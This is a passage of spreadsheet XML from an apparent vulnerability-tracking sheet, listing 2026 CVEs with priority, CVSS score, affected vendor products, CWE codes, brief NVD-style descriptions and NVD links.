          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83980</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K22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0" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr"/>
      <c r="Q220" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83981</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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1" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr"/>
      <c r="Q221" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83982</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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2" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr"/>
      <c r="Q222" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83983</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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3" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr"/>
      <c r="Q223" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83985</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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4" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr"/>
      <c r="Q224" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83986</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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5" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr"/>
      <c r="Q225" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83987</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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6" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr"/>
      <c r="Q226" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83988</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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27" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr"/>
      <c r="Q227" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83990</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K228" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr"/>
      <c r="Q228" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83995</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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29" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr"/>
      <c r="Q229" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84000</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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30" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr"/>
      <c r="Q230" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66767</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr"/>
      <c r="Q231" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Application Server for ABAP and ABAP Platform allows an unauthenticated user to send a specially crafted packet that triggers reprocessing of a previously buffered user request, potentially hijacking another user's session under narrow timing conditions. Successful exploitation could result in high impact on confidentiality and integrity, with low impact on availability of the application.</t>
        </is>
      </c>
      <c r="S231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69683</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K232" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr"/>
      <c r="Q232" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78623</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr"/>
      <c r="Q233" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R233"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S233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82053</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K234" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr"/>
      <c r="Q234" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's LDAP authorization integration where pooled LDAP connections can retain stale authentication identities after user authentication under certain configurations. Subsequent authorization queries may execute under an unintended LDAP identity rather than the expected one. This can result in incorrect role assignments based on the LDAP directory's access control configuration, potentially allowing an authenticated user to acquire elevated privileges that were not intended by the deployment's authorization policy.</t>
        </is>
      </c>
      <c r="S234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55215</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr"/>
      <c r="Q235" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-522</t>
        </is>
      </c>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases. Prior to versions 3.3.3, 3.4.6, and 3.5.3, when ssl is enabled without a pinned CA or server certificate, MariaDB Connector/Node.js sends credentials before completing certificate fingerprint validation. In lib/cmd/handshake/auth/handshake.js, a server that selects mysql_clear_password as the initial authentication plugin can receive the password before the post-TLS identity check. In lib/cmd/handshake/authentication.js, an authentication switch can evaluate the previous plugin instead of the requested target plugin, allowing mysql_clear_password to send the credential first. An active man-in-the-middle can present a self-signed certificate, capture the database password, and use it to authenticate directly even though the connector later rejects the server and closes the connection. This issue is fixed in versions 3.3.3, 3.4.6, and 3.5.3.</t>
        </is>
      </c>
      <c r="S235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55215</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67376</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr"/>
      <c r="Q236" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69342</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K237" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
